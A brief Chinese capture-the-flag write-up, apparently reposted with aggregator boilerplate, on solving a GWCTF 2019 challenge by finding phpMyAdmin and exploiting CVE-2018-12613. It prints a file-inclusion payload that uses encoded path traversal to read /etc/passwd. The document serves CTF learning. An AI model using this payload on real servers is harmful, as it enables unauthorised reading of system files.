BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin

本文主要是介绍BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

 啥都没有，前后端抓包也找不到啥，估计是目录扫描，但是号称第一的dirmap-master也没扫出啥

后来看博客，大佬们说看题目名字就猜到考啥，访问phpmyadmin路径（记下

phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具

存在漏洞cve-2018-12613-PhpMyadmin后台文件包含

payload：target=db_datadict.php%253f/../../../../../../../../etc/passwd

 看flag

这篇关于BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！